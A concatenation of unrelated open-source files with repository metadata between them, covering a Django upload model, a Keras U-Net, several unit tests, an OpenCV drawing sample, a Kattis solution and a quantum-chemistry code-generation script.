temporary_file_path = models.CharField(max_length=4096, null=True)
expires = models.DateTimeField(null=True, blank=True)
class Meta:
abstract = True
def get_metadata(self):
return json.loads(self.upload_metadata)
def clean_fields(self, exclude=None):
super().clean_fields(exclude=exclude)
if self.upload_offset < 0:
raise ValidationError(_('upload_offset should be >= 0.'))
def write_data(self, upload_bytes, chunk_size):
num_bytes_written = write_bytes_to_file(
self.temporary_file_path,
self.upload_offset,
upload_bytes,
makedirs=True
)
if num_bytes_written > 0:
self.upload_offset += num_bytes_written
self.save()
@property
def size(self):
return self.upload_offset
@property
def content_type(self):
return self.get_metadata().get('filetype')
@property
def name(self):
return self.filename
def delete(self, *args, **kwargs):
if self.temporary_file_exists():
os.remove(self.temporary_file_path)
super().delete(*args, **kwargs)
def get_file(self):
if not self.is_complete():
return None
if self.temporary_file_exists():
return TusFile(open(self.temporary_file_path, 'rb'))
return None
def generate_filename(self):
return os.path.join('{}.bin'.format(uuid.uuid4()))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
if not self.filename:
self.filename = self.generate_filename()
return super().save(
force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
def is_complete(self):
return self.upload_offset == self.upload_length
def temporary_file_exists(self):
return self.temporary_file_path and os.path.isfile(self.temporary_file_path)
def get_or_create_temporary_file(self):
if not self.temporary_file_path:
fd, path = tempfile.mkstemp(prefix="tus-upload-")
os.close(fd)
self.temporary_file_path = path
self.save()
assert os.path.isfile(self.temporary_file_path)
return self.temporary_file_path
@transition(field=state, source=states.INITIAL, target=states.RECEIVING, conditions=[temporary_file_exists])
def start_receiving(self):
"""
State transition to indicate the first file chunk has been received successfully
"""
# Trigger signal
# signals.receiving.send(sender=self.__class__, instance=self)
def ensure_saving(self):
if self.state == states.RECEIVING:
self.start_saving()
@transition(field=state, source=states.RECEIVING, target=states.SAVING, conditions=[is_complete])
def start_saving(self):
"""
State transition to indicate that the upload is complete, and that the temporary file will be transferred to
its final destination.
"""
# Trigger signal
# signals.saving.send(sender=self.__class__, instance=self)
@transition(field=state, source=states.SAVING, target=states.DONE)
def finish(self):
"""
State transition to indicate the upload is ready and the file is ready for access
"""
# Trigger signal
class UploadManager(models.Manager):
def get_by_url(self, upload_url, user=None, token=None):
try:
match = resolve(upload_url)
except Resolver404:
return None
guid = match.kwargs.get('guid')
if guid is None:
return None
try:
return Upload.objects.get(
user=user, token=token, guid=guid
)
except Upload.DoesNotExist:
return None
class Upload(AbstractUpload):
user = models.ForeignKey(
get_user_model(), blank=True, null=True,
on_delete=models.CASCADE
)
token = models.UUIDField(null=True, blank=True)
objects = UploadManager()
|
[
"mail@stefanwehrmeyer.com"
] |
mail@stefanwehrmeyer.com
|
ac1630018ac308daa7325e487f00b2acbe3b7d63
|
1271ef78335bc7b3af9fd0d7e988edc3c3ff6edf
|
/python/models/sampling_model.py
|
48c383d7637ce57ce95cecd01ee047b1d4f512cd
|
[] |
no_license
|
BB8-2020/FARM-deforestation
|
97b60699ae4468e3a53b5b970b395b2137047915
|
5b9df46ed6ff125f5697d6753a301bbf9538e555
|
refs/heads/main
| 2023-06-08T21:01:55.212018
| 2021-06-25T14:56:58
| 2021-06-25T14:56:58
| 351,037,514
| 0
| 0
| null | 2021-06-25T14:56:59
| 2021-03-24T10:28:56
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,708
|
py
|
"""File to host a modified unet implementation with emphasises on a additional up/downsampling layer."""
from keras import Input, Model
from keras import layers as keras_layers
def get_sampling_model(img_size: tuple = (512, 512), num_classes: int = 2) -> Model:
"""Create and return a UNET model.
Parameters
----------
img_size
The image size in pixel dimensions.
num_classes
The amount of classes to classify.
Returns
-------
model
The created UNET model.
"""
inputs = Input(shape=img_size + (3,))
#: [First half of the network: downsampling inputs].
x = keras_layers.Conv2D(32, 3, strides=2, padding="same")(inputs)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
#: Set aside residual.
previous_block_activation = x
#: Blocks 1, 2, 3 are identical apart from the feature depth.
for filters in [64, 128, 256, 512]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.MaxPooling2D(3, strides=2, padding="same")(x)
#: Project residual.
residual = keras_layers.Conv2D(filters, 1, strides=2, padding="same")(
previous_block_activation
)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: [Second half of the network: upsampling inputs].
for filters in [512, 256, 128, 64, 32]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.UpSampling2D(2)(x)
#: Project residual.
residual = keras_layers.UpSampling2D(2)(previous_block_activation)
residual = keras_layers.Conv2D(filters, 1, padding="same")(residual)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: Add a per-pixel classification layer.
outputs = keras_layers.Conv2D(num_classes, 3, activation="softmax", padding="same")(
x
)
#: Define the model.
model = Model(inputs, outputs)
return model
|
[
"abou.w@hotmail.com"
] |
abou.w@hotmail.com
|
d91641c566c3d076846c9b064aa4cad9824e56fe
|
243515329480040575331d2336152f4023fbc475
|
/tests/test_interface.py
|
c7beecd72246899831b41544150867edc8d9ab96
|
[
"MIT"
] |
permissive
|
Ariyatina/skidl
|
439eec7a6ae36a58fc052d8b827f88c89756cc13
|
5aace5c463403b29604a1dc2c32f4da8c86796d3
|
refs/heads/master
| 2023-07-18T09:23:24.173653
| 2021-07-21T13:54:39
| 2021-07-21T13:54:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,764
|
py
|
import pytest
from skidl import *
from .setup_teardown import *
def test_interface_1():
"""Test interface."""
@subcircuit
def resdiv(gnd, vin, vout):
res = Part("Device", "R", dest=TEMPLATE)
r1 = res(value="1k")
r2 = res(value="500")
cap = Part("Device", "C", dest=TEMPLATE)
c1 = cap()
c2 = cap(value="1uF")
bus1 = Bus("BB", 10)
vin += r1[1], c1[1] # Connect the input to the first resistor.
gnd += r2[2], c2[2] # Connect the second resistor to ground.
vout += (
r1[2],
c1[2],
r2[1],
c2[1],
) # Output comes from the connection of the two resistors.
intfc = Interface(gnd=Net("GND"), vin=Net("VI"), vout=Net("VO"),)
intfc.gnd.aliases += "GND"
intfc.gnd.aliases += "GNDA"
resdiv(**intfc)
resdiv(**intfc)
assert len(default_circuit.parts) == 8
assert len(default_circuit.get_nets()) == 3
assert len(default_circuit.buses) == 2
assert len(Net.fetch("GND")) == 4
assert len(Net.fetch("VI")) == 4
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 4
assert len(intfc.vin) == 4
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 4
assert len(intfc["vin"]) == 4
assert len(intfc["vout"]) == 8
intfc.gnd += Pin()
intfc["vin"] += Pin()
assert len(Net.fetch("GND")) == 5
assert len(Net.fetch("VI")) == 5
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 5
assert len(intfc.vin) == 5
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 5
assert len(intfc["vin"]) == 5
assert len(intfc["vout"]) == 8
assert len(intfc["GND"]) == 5
assert len(intfc["GNDA"]) == 5
|
[
"devb@xess.com"
] |
devb@xess.com
|
b3d298466335c9f5ca3764f658192afc3d03c556
|
eb3683f9127befb9ef96d8eb801206cf7b84d6a7
|
/stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/slice/error_slice_parameters.py
|
6c7b78a0cf9f6ccf806fb2b85a199b8498b304a2
|
[] |
no_license
|
ComputationalReflection/stypy
|
61ec27333a12f76ac055d13f8969d3e0de172f88
|
be66ae846c82ac40ba7b48f9880d6e3990681a5b
|
refs/heads/master
| 2021-05-13T18:24:29.005894
| 2018-06-14T15:42:50
| 2018-06-14T15:42:50
| 116,855,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,607
|
py
|
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "slice method is present, but is invoked with a wrong number of parameters"
3:
4: if __name__ == '__main__':
5: # Call options
6: # (AnyType) -> <type 'slice'>
7: # (AnyType, AnyType) -> <type 'slice'>
8: # (AnyType, AnyType, AnyType) -> <type 'slice'>
9:
10:
11: # Call the builtin with incorrect number of parameters
12: # Type error
13: ret = slice(3, 4, 5, 6)
14:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'slice method is present, but is invoked with a wrong number of parameters')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)
if (__name__ == '__main__'):
# Assigning a Call to a Name (line 13):
# Call to slice(...): (line 13)
# Processing the call arguments (line 13)
int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 16), 'int')
int_4 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 19), 'int')
int_5 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 22), 'int')
int_6 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 25), 'int')
# Processing the call keyword arguments (line 13)
kwargs_7 = {}
# Getting the type of 'slice' (line 13)
slice_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 13, 10), 'slice', False)
# Calling slice(args, kwargs) (line 13)
slice_call_result_8 = invoke(stypy.reporting.localization.Localization(__file__, 13, 10), slice_2, *[int_3, int_4, int_5, int_6], **kwargs_7)
# Assigning a type to the variable 'ret' (line 13)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 13, 4), 'ret', slice_call_result_8)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
[
"redondojose@uniovi.es"
] |
redondojose@uniovi.es
|
63f5c6f169809e05a1c1c88bec3d9875c56284bd
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_thudded.py
|
a00c7db9bd98c96d51333c65808b2fee71f3d38a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 218
|
py
|
#calss header
class _THUDDED():
def __init__(self,):
self.name = "THUDDED"
self.definitions = thud
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['thud']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
5d6b71efebb6a271a66b3250e0e7046636ba5f4d
|
32f5bc330388a96877d93fdd7b21599a40735400
|
/Python/bitbybit.py
|
4d3828f05ee797f54e45115008e3d6f1e9edac58
|
[] |
no_license
|
alexlwn123/kattis
|
670180d86f0863328a16e12ed937c2fefb3226a2
|
c1163bae3fdaf95c1087b216c48e7e19059d3d38
|
refs/heads/master
| 2021-06-21T16:26:15.642449
| 2020-12-24T20:59:10
| 2020-12-24T20:59:10
| 152,286,208
| 1
| 1
| null | 2018-10-14T22:40:09
| 2018-10-09T16:40:48
|
Java
|
UTF-8
|
Python
| false
| false
| 891
|
py
|
def main():
n = int(input())
while n:
bits = [-1 for i in range(32)]
for i in range(n):
line = input().split()
if line[0] == 'SET':
bits[int(line[1])] = 1
elif line[0] == 'CLEAR':
bits[int(line[1])] = 0
elif line[0] == 'AND':
i, j = int(line[1]), int(line[2])
if bits[i] == 0 or bits[j] == 0:
bits[i] = 0
elif bits[i] == 1 and bits[j] == 1:
bits[i] = 1
else:
bits[i] = -1
elif line[0] == 'OR':
i, j = int(line[1]), int(line[2])
if bits[i] == 1 or bits[j] == 1:
bits[i] = 1
elif bits[i] == -1 or bits[j] == -1:
bits[i] = -1
n = int(input())
for i in range(32):
if bits[i] == -1:
bits[i] = "?"
else:
bits[i] = str(bits[i])
print("".join(bits[::-1]))
if __name__ == '__main__':
main()
|
[
"asl0028@auburn.edu"
] |
asl0028@auburn.edu
|
736d6c3a30b3f19c88dbb1dfae335929360d9d92
|
27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f
|
/tests/unit/plugins/strategy/test_strategy_linear.py
|
4c854f532cb71f360af50c823f22c8a95ec4c5f8
|
[] |
no_license
|
coll-test/notstdlib.moveitallout
|
eb33a560070bbded5032385d0aea2f3cf60e690b
|
0987f099b783c6cf977db9233e1c3d9efcbcb3c7
|
refs/heads/master
| 2020-12-19T22:28:33.369557
| 2020-01-23T18:51:26
| 2020-01-23T18:51:26
| 235,865,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,853
|
py
|
# Copyright (c) 2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.notstdlib.moveitallout.tests.unit.compat import unittest
from ansible_collections.notstdlib.moveitallout.tests.unit.compat.mock import patch, MagicMock
from ansible.executor.play_iterator import PlayIterator
from ansible.playbook import Playbook
from ansible.playbook.play_context import PlayContext
from ansible_collections.notstdlib.moveitallout.plugins.strategy.linear import StrategyModule
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.loader import DictDataLoader
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.path import mock_unfrackpath_noop
class TestStrategyLinear(unittest.TestCase):
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_noop(self):
fake_loader = DictDataLoader({
"test_play.yml": """
- hosts: all
gather_facts: no
tasks:
- block:
- block:
- name: task1
debug: msg='task1'
failed_when: inventory_hostname == 'host01'
- name: task2
debug: msg='task2'
rescue:
- name: rescue1
debug: msg='rescue1'
- name: rescue2
debug: msg='rescue2'
""",
})
mock_var_manager = MagicMock()
mock_var_manager._fact_cache = dict()
mock_var_manager.get_vars.return_value = dict()
p = Playbook.load('test_play.yml', loader=fake_loader, variable_manager=mock_var_manager)
inventory = MagicMock()
inventory.hosts = {}
hosts = []
for i in range(0, 2):
host = MagicMock()
host.name = host.get_name.return_value = 'host%02d' % i
hosts.append(host)
inventory.hosts[host.name] = host
inventory.get_hosts.return_value = hosts
inventory.filter_hosts.return_value = hosts
mock_var_manager._fact_cache['host00'] = dict()
play_context = PlayContext(play=p._entries[0])
itr = PlayIterator(
inventory=inventory,
play=p._entries[0],
play_context=play_context,
variable_manager=mock_var_manager,
all_vars=dict(),
)
tqm = TaskQueueManager(
inventory=inventory,
variable_manager=mock_var_manager,
loader=fake_loader,
passwords=None,
forks=5,
)
tqm._initialize_processes(3)
strategy = StrategyModule(tqm)
strategy._hosts_cache = [h.name for h in hosts]
strategy._hosts_cache_all = [h.name for h in hosts]
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# debug: task1, debug: task1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, 'task1')
self.assertEqual(host2_task.name, 'task1')
# mark the second host failed
itr.mark_host_failed(hosts[1])
# debug: task2, meta: noop
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'meta')
self.assertEqual(host1_task.name, 'task2')
self.assertEqual(host2_task.name, '')
# meta: noop, debug: rescue1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue1')
# meta: noop, debug: rescue2
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue2')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# end of iteration
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNone(host1_task)
self.assertIsNone(host2_task)
|
[
"wk@sydorenko.org.ua"
] |
wk@sydorenko.org.ua
|
46f958cb763206d56bc7da152abd572fd4efbcdd
|
f848ebf1adb25cc6d188f43fb02c06dad1b01651
|
/script/test_inrm_login_params.py
|
5495769f03c5f39cd9e6a55464118c0e8a19183c
|
[] |
no_license
|
miao88318/day03_apiTestIHRM
|
673320c724d9a661fa9ed120a62e0d82118719d9
|
213e4a498055e693993b21ca2bc7942af2a25c74
|
refs/heads/master
| 2022-07-28T04:39:05.390142
| 2020-05-21T07:06:23
| 2020-05-21T07:06:23
| 265,769,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 978
|
py
|
# 导包
import unittest
import logging
import requests
from parameterized import parameterized
import app
from api.login_api import TestLoginApi
from utils import assert_common, read_login_data
# 创建测试类,继承unittest.TestCase
class TestIHRMLogin(unittest.TestCase):
def setUp(self):
self.login_api = TestLoginApi()
def tearDown(self):
...
filename = app.BASE_DIR + "/data/login_data.json"
@parameterized.expand(read_login_data(filename))
def test01_login_success(self,case_name,jsonData,http_code,success,code,message):
# 发送登录请求
headers = {"Content-Type": "application/json"}
jsonData = jsonData
response = self.login_api.login(jsonData, headers)
result = response.json()
# print("结果:", result)
logging.info("结果: {}".format(result))
# 使用封装的通用断言函数
assert_common(http_code, success, code, message, response, self)
|
[
"stan@stan.com"
] |
stan@stan.com
|
f5066bcfc3cd5773cce13c4c7639419c5523cd4a
|
f83ef53177180ebfeb5a3e230aa29794f52ce1fc
|
/opencv/opencv-3.4.2/samples/python/tutorial_code/core/BasicGeometricDrawing/basic_geometric_drawing.py
|
ec25d64a455c231b53d1115a53f1480bab1b6d82
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
msrLi/portingSources
|
fe7528b3fd08eed4a1b41383c88ee5c09c2294ef
|
57d561730ab27804a3172b33807f2bffbc9e52ae
|
refs/heads/master
| 2021-07-08T01:22:29.604203
| 2019-07-10T13:07:06
| 2019-07-10T13:07:06
| 196,183,165
| 2
| 1
|
Apache-2.0
| 2020-10-13T14:30:53
| 2019-07-10T10:16:46
| null |
UTF-8
|
Python
| false
| false
| 3,092
|
py
|
import cv2 as cv
import numpy as np
W = 400
## [my_ellipse]
def my_ellipse(img, angle):
thickness = 2
line_type = 8
cv.ellipse(img,
(W / 2, W / 2),
(W / 4, W / 16),
angle,
0,
360,
(255, 0, 0),
thickness,
line_type)
## [my_ellipse]
## [my_filled_circle]
def my_filled_circle(img, center):
thickness = -1
line_type = 8
cv.circle(img,
center,
W / 32,
(0, 0, 255),
thickness,
line_type)
## [my_filled_circle]
## [my_polygon]
def my_polygon(img):
line_type = 8
# Create some points
ppt = np.array([[W / 4, 7 * W / 8], [3 * W / 4, 7 * W / 8],
[3 * W / 4, 13 * W / 16], [11 * W / 16, 13 * W / 16],
[19 * W / 32, 3 * W / 8], [3 * W / 4, 3 * W / 8],
[3 * W / 4, W / 8], [26 * W / 40, W / 8],
[26 * W / 40, W / 4], [22 * W / 40, W / 4],
[22 * W / 40, W / 8], [18 * W / 40, W / 8],
[18 * W / 40, W / 4], [14 * W / 40, W / 4],
[14 * W / 40, W / 8], [W / 4, W / 8],
[W / 4, 3 * W / 8], [13 * W / 32, 3 * W / 8],
[5 * W / 16, 13 * W / 16], [W / 4, 13 * W / 16]], np.int32)
ppt = ppt.reshape((-1, 1, 2))
cv.fillPoly(img, [ppt], (255, 255, 255), line_type)
# Only drawind the lines would be:
# cv.polylines(img, [ppt], True, (255, 0, 255), line_type)
## [my_polygon]
## [my_line]
def my_line(img, start, end):
thickness = 2
line_type = 8
cv.line(img,
start,
end,
(0, 0, 0),
thickness,
line_type)
## [my_line]
## [create_images]
# Windows names
atom_window = "Drawing 1: Atom"
rook_window = "Drawing 2: Rook"
# Create black empty images
size = W, W, 3
atom_image = np.zeros(size, dtype=np.uint8)
rook_image = np.zeros(size, dtype=np.uint8)
## [create_images]
## [draw_atom]
# 1. Draw a simple atom:
# -----------------------
# 1.a. Creating ellipses
my_ellipse(atom_image, 90)
my_ellipse(atom_image, 0)
my_ellipse(atom_image, 45)
my_ellipse(atom_image, -45)
# 1.b. Creating circles
my_filled_circle(atom_image, (W / 2, W / 2))
## [draw_atom]
## [draw_rook]
# 2. Draw a rook
# ------------------
# 2.a. Create a convex polygon
my_polygon(rook_image)
## [rectangle]
# 2.b. Creating rectangles
cv.rectangle(rook_image,
(0, 7 * W / 8),
(W, W),
(0, 255, 255),
-1,
8)
## [rectangle]
# 2.c. Create a few lines
my_line(rook_image, (0, 15 * W / 16), (W, 15 * W / 16))
my_line(rook_image, (W / 4, 7 * W / 8), (W / 4, W))
my_line(rook_image, (W / 2, 7 * W / 8), (W / 2, W))
my_line(rook_image, (3 * W / 4, 7 * W / 8), (3 * W / 4, W))
## [draw_rook]
cv.imshow(atom_window, atom_image)
cv.moveWindow(atom_window, 0, 200)
cv.imshow(rook_window, rook_image)
cv.moveWindow(rook_window, W, 200)
cv.waitKey(0)
cv.destroyAllWindows()
|
[
"lihuibin705@163.com"
] |
lihuibin705@163.com
|
8524d570eba1d25b43e2af97a5dbfbeccd5cddf8
|
fc73e7249e227e5507976bd3825af037fbe6b46b
|
/legacy/lcc_codes/lcc_ccvv.py
|
9e7115bdb17baa96e0163bf5d61d2702fd92c978
|
[
"LicenseRef-scancode-philippe-de-muyter"
] |
permissive
|
mussard/SecondQuantizationAlgebra
|
32d10d85abae82da343c9b41764802f3f541d551
|
ee32159e24d510654a6d38df391b544ec9ffeb4a
|
refs/heads/master
| 2020-03-17T21:46:28.875095
| 2019-07-10T17:31:26
| 2019-07-10T17:31:26
| 133,974,911
| 0
| 0
| null | 2018-05-18T15:50:13
| 2018-05-18T15:50:13
| null |
UTF-8
|
Python
| false
| false
| 7,597
|
py
|
import secondQuantizationAlgebra as sqa
import writeCode
import geraldCode
sqa.options.verbose = False
# definitions
tag_core = sqa.options.core_type
tag_active = sqa.options.active_type
tag_virtual = sqa.options.virtual_type
a = sqa.index('Va', [tag_virtual], True)
b = sqa.index('Vb', [tag_virtual], True)
c = sqa.index('Vc', [tag_virtual], True)
d = sqa.index('Vd', [tag_virtual], True)
i = sqa.index('Ci', [tag_core], True)
j = sqa.index('Cj', [tag_core], True)
k = sqa.index('Ck', [tag_core], True)
l = sqa.index('Cl', [tag_core], True)
p = sqa.index('Ap', [tag_active], True)
q = sqa.index('Aq', [tag_active], True)
r = sqa.index('Ar', [tag_active], True)
s = sqa.index('As', [tag_active], True)
x1 = sqa.index('Au', [tag_active], True)
x2 = sqa.index('Av', [tag_active], True)
x3 = sqa.index('Aw', [tag_active], True)
x4 = sqa.index('Ax', [tag_active], True)
i1 = sqa.index('Cm', [tag_core], True)
i2 = sqa.index('Cn', [tag_core], True)
i3 = sqa.index('Co', [tag_core], True)
i4 = sqa.index('Co1', [tag_core], True)
a1 = sqa.index('Vg', [tag_virtual], True)
a2 = sqa.index('Vh', [tag_virtual], True)
a3 = sqa.index('Ve', [tag_virtual], True)
a4 = sqa.index('Vf', [tag_virtual], True)
#h0 one body term
hsym = sqa.symmetry((1,0), 1)
Dsym_a = sqa.symmetry((2,1, 0,3), 1)
Dsym_b = sqa.symmetry((0,3, 2,1), 1)
Dsym_c = sqa.symmetry((1,0, 3,2), 1)
K_C = sqa.tensor('int1c', [i1,i2], [hsym])
K_A = sqa.tensor('int1a', [x1,x2], [hsym])
K_V = sqa.tensor('int1v', [a1,a2], [hsym])
V_CA1 = sqa.tensor('int2ca1', [i1,x1, i2,x2], [Dsym_a, Dsym_b])
V_CA2 = sqa.tensor('int2ca2', [i1,x1, x2,i2], [])
V_CV1 = sqa.tensor('int2cv1', [i1,a1, i2,a2], [Dsym_a, Dsym_b])
V_CV2 = sqa.tensor('int2cv2', [i1,a1, a2,i2], [])
V_AV1 = sqa.tensor('int2av1', [x1,a1, x2,a2], [Dsym_a, Dsym_b])
V_AV2 = sqa.tensor('int2av2', [x1,a1, a2,x2], [])
V_C = sqa.tensor('int2c', [i1,i2, i3,i4], [Dsym_a, Dsym_b, Dsym_c])
V_A = sqa.tensor('int2a', [x1,x2, x3,x4], [Dsym_a, Dsym_b, Dsym_c])
V_V = sqa.tensor('int2v', [a1,a2, a3,a4], [Dsym_a, Dsym_b, Dsym_c])
deltaC = sqa.tensor('deltac', [i1,i2], [hsym])
deltaA = sqa.tensor('deltaa', [x1,x2], [hsym])
deltaV = sqa.tensor('deltav', [a1,a2], [hsym])
ampstring = "eecc" #amplitude string
AllTensors = ["t", "R", "int1c", "int1a", "int1v", "int2ca1", "int2ca2",\
"int2cv1", "int2cv2", "int2av1", "int2av2", "int2c", "int2a", "int2v",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "V", "deltac", "deltaa", "deltav", "t1"]
CommentTensors = ["t", "R", "k", "k", "k", "W", "W",\
"W", "W", "W", "W", "W", "W", "W",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "W", "delta", "delta", "delta", "t1"]
Domains = [ampstring, ampstring, "cc", "aa", "ee", "caca", "caac",\
"cece", "ceec", "aeae", "aeea", "cccc", "aaaa", "eeee",\
"aa", "aaaa", "aaaaaa", "aa", "aa", ampstring, ampstring, ampstring, ampstring,\
ampstring, ampstring, ampstring, ampstring, "cc", "aa", "ee", ampstring]
Usage = ["A", "R", "H", "H", "H", "H", "H",\
"H", "H", "H", "H", "H", "H", "H",\
"D", "D", "D", "D", "D", "A", "A", "A", "A",\
"A", "A", "A", "H", "D", "D", "D", "A"]
pDomains = "\tint f(int i) {\n"
pDomains += "\t\treturn 2*i;\n"
pDomains += "\t}\n"
pDomains += "\tFDomainDecl DomainDecls[1] = {\n"
pDomains += "\t\t{\"A\", \"a\", f}\n"
pDomains += "\t};"
CommentKey = {}
print "namespace MRLCC_CCVV {\n"
for tc in list(zip(AllTensors, CommentTensors)):
CommentKey[tc[0]] = tc[1]
geraldCode.writeTensors(AllTensors, CommentKey, Domains, Usage)
HD_C = sqa.term( 0.5, [""], [V_C, sqa.sfExOp([i1,i2,i3,i4])] )
HD_A = sqa.term( 0.5, [""], [V_A, sqa.sfExOp([x1,x2,x3,x4])] )
HD_V = sqa.term( 0.5, [""], [V_V, sqa.sfExOp([a1,a2,a3,a4])] )
HD_CA1 = sqa.term( 1.0, [""], [V_CA1, sqa.sfExOp([i1,x1,i2,x2])] )
HD_CA2 = sqa.term( 1.0, [""], [V_CA2, sqa.sfExOp([i1,x1,x2,i2])] )
HD_CV1 = sqa.term( 1.0, [""], [V_CV1, sqa.sfExOp([i1,a1,i2,a2])] )
HD_CV2 = sqa.term( 1.0, [""], [V_CV2, sqa.sfExOp([i1,a1,a2,i2])] )
HD_AV1 = sqa.term( 1.0, [""], [V_AV1, sqa.sfExOp([x1,a1,x2,a2])] )
HD_AV2 = sqa.term( 1.0, [""], [V_AV2, sqa.sfExOp([x1,a1,a2,x2])] )
